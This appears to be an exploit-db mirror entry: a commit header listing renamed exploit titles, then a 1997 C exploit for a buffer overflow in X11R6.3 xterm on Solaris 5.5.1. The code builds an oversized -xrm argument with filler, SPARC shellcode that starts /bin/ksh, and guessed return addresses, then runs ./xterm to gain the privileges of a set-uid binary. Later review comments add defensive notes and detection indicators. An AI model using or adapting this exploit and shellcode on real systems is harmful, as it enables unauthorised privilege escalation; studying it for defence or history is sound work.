exploit-db-mirror/platforms/solaris/local/338.c
Offensive Security 477bcbdcc0 DB: 2016-03-17
5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities
AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
2016-03-17 07:07:56 +00:00


/*
* X11R6.3 xterm exploit for solaris 5.5.1 by DCRH 28/5/97
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
/* Byte sizes of the three regions main() writes into buf, in write order:
 * EXTRA2 (rotated SAFE_ADDR words), BUF_LENGTH (filler words followed by
 * sparc_shellcode), EXTRA (repeated targ_addr words). */
#define EXTRA2 1300
#define BUF_LENGTH 400
#define EXTRA 500
/* Need an addr such that contents of addr+0xe98 = 0 */
/* NOTE(review): hard-coded 32-bit address. The requirement above is the
 * original author's and presumably depends on the memory layout of the
 * specific xterm build named in the file header; it cannot be verified
 * from this file. */
#define SAFE_ADDR ((unsigned)0xefff2008)
/* Subtracted from this process's own stack pointer in main() to form
 * targ_addr, the value repeated in the last region of buf. */
#define STACK_OFFSET 0x4800
/* 32-bit filler word written in front of sparc_shellcode by main(). The value
 * contains no zero byte, which matters because buf is passed as a C string.
 * For triage: a long run of this word inside a process argument is a usable
 * indicator of this particular file. */
#define SPARC_NOP 0xa61cc013
/*
 * Payload: 15 SPARC instruction words that main() copies verbatim into buf.
 * Going by the per-word disassembly below, the two sethi/or pairs load the
 * eight bytes "/bin/ksh" (0x2f62696e, 0x2f6b7368) into %l6/%l7, the stores
 * place that string and zero words on the stack, and `mov 0x3b, %g1; ta 8`
 * requests system call number 0x3b (presumably execve on Solaris; confirm
 * against the target's sys/syscall.h). The final word is deliberately an
 * invalid instruction.
 *
 * Defensive reading: the payload only starts a shell, so its impact is the
 * privilege of the process it runs in. It executes from the stack, so a
 * non-executable user stack prevents this form of the attack.
 *
 * NOTE(review): element type is u_long, so each word occupies
 * sizeof(u_long) bytes; the layout arithmetic in main() is only meaningful
 * where that is 4.
 */
u_long sparc_shellcode[] =
{
0x2d0bd89a, /* sethi %hi(0x2f626800), %l6 */
0xac15a16e, /* or %l6, 0x16e, %l6 */
0x2f0bdadc, /* sethi %hi(0x2f6b7000), %l7 */
0xae15e368, /* or %l7, 0x368, %l7 */
0x900b800e, /* and %sp, %sp, %o0 */
0x9203a00c, /* add %sp, 0xc, %o1 */
0x941ac00b, /* xor %o3, %o3, %o2 */
0x9c03a014, /* add %sp, 0x14, %sp */
0xec3bbfec, /* std %l6, [ %sp + -20 ] */
0xc023bff4, /* clr [ %sp + -12 ] */
0xdc23bff8, /* st %sp, [ %sp + -8 ] */
0xc023bffc, /* clr [ %sp + -4 ] */
0x8210203b, /* mov 0x3b, %g1 */
0x91d02008, /* ta 8 */
0xffffffff, /* illegal */
};
/*
 * Returns the current stack pointer of this process.
 *
 * The value is produced by copying %sp into %i0 in inline assembly; there is
 * no C return statement, so the result depends on the SPARC convention that
 * %i0 carries the callee's return value. NOTE(review): this is undefined
 * behaviour in ISO C and only builds for SPARC with a compiler that accepts
 * this asm syntax; an optimising compiler may not preserve it.
 */
u_long get_sp(void)
{
asm("mov %sp,%i0 \n");
}
/* Argument string that main() passes to xterm after "-xrm". It has static
 * storage, so the bytes main() does not write stay zero and terminate the
 * string; the extra 8 bytes leave room for that. */
char buf[BUF_LENGTH + EXTRA + EXTRA2 + 8];
/* Single environment entry for the child. main() pads it with 'a' up to the
 * full 0x4000 bytes (16 KiB) including the terminator. */
char longvar[0x4000] = "BLAH=";
/*
 * Builds an oversized "-xrm" argument in buf and executes ./xterm with it.
 *
 * argv[1] (optional): integer subtracted, together with STACK_OFFSET, from
 * this process's stack pointer to form targ_addr. It is parsed with atoi(),
 * so non-numeric input silently becomes 0.
 *
 * Layout written to buf, in order: EXTRA2 bytes of SAFE_ADDR rotated right
 * by 8 bits, (BUF_LENGTH - code_length) bytes of SPARC_NOP, the
 * sparc_shellcode words, then EXTRA bytes of targ_addr. The buffer that is
 * overrun lives in xterm and is not shown in this file; the header names
 * X11R6.3 xterm on Solaris 5.5.1 as the affected build.
 *
 * Defensive notes:
 *  - Impact is limited to the privilege xterm runs with, so it presumably
 *    matters only where xterm is installed set-uid; removing that bit or
 *    installing a fixed X11 release removes the exposure.
 *  - The payload runs from the stack, so a non-executable user stack blocks
 *    this form of the attack.
 *  - Observable artefacts: xterm started by relative path with a roughly
 *    2 KB non-printable -xrm argument and an environment that holds only one
 *    16 KiB variable "BLAH=aaa...".
 *
 * NOTE(review): `void main` is non-standard; memset() is used without
 * <string.h>; the perror() text says "execl" although the call is execle();
 * the size arithmetic assumes sizeof(u_long) == 4.
 */
void main(int argc, char *argv[])
{
char *env[2];
unsigned long targ_addr;
u_long *long_p;
int i, code_length = sizeof(sparc_shellcode),dso=0;
/* Optional tuning value from the command line; not validated. */
if(argc > 1) dso=atoi(argv[1]);
long_p =(u_long *) buf;
/* Region 1: SAFE_ADDR rotated right by 8 bits (the file does not say why). */
for (i = 0; i < EXTRA2 / sizeof(u_long); i++)
*long_p++ = (SAFE_ADDR >> 8) | (SAFE_ADDR << 24);
/* A guess derived from this process's own stack pointer, not from the child. */
targ_addr = get_sp() - STACK_OFFSET - dso;
/* Region 2: filler words, then the payload words, BUF_LENGTH bytes in total. */
for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
*long_p++ = SPARC_NOP;
for (i = 0; i < code_length / sizeof(u_long); i++)
*long_p++ = sparc_shellcode[i];
/* Region 3: the guessed address repeated over EXTRA bytes. */
for (i = 0; i < EXTRA / sizeof(u_long); i++)
*long_p++ = targ_addr;
printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n",
targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET);
/* This is just to shove the stack down a bit */
memset(&longvar[5], 'a', sizeof longvar-6);
longvar[sizeof longvar -1] = '\0';
/* The child gets exactly one environment entry, followed by the terminator. */
env[0] = longvar;
env[1] = NULL;
/* Runs the xterm binary found in the current directory, not one from PATH. */
execle("./xterm", "xterm", "-xrm", buf,(char *) 0, env);
/* Reached only when execle() returns, which means it failed. */
perror("execl failed");
}
// milw0rm.com [1997-05-28]